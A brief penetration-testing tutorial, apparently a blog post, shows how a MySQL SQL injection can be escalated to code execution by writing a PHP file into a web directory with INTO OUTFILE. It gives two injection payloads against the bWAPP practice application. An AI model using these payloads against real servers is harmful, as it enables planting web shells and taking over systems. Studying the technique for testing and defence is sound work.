Two ways to upload WebShell through SQLi

From SQL injection to RCE

Once a MySQL database server has been compromised at the root level, it’s often possible to escalate this access to full system level access. In your penetration testing, it is wonderful to get RCE. If you found SQL injection vulnerability, you would need to test RCE.

Requirement:

• Root
• No configuration –secure-file-priv
• Writable file

Using union

id=ddos) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/var/www/html/bWAPP/image/phpinfo.php’%23

no union

id=ddos) into outfile ‘/var/www/html/bWAPP/image/phpinfo’ fields terminated by ‘<? phpinfo(); ?>’%23

For more details, view my video tutorial below

https://www.youtube.com/watch?v=3_sWRSWMm7M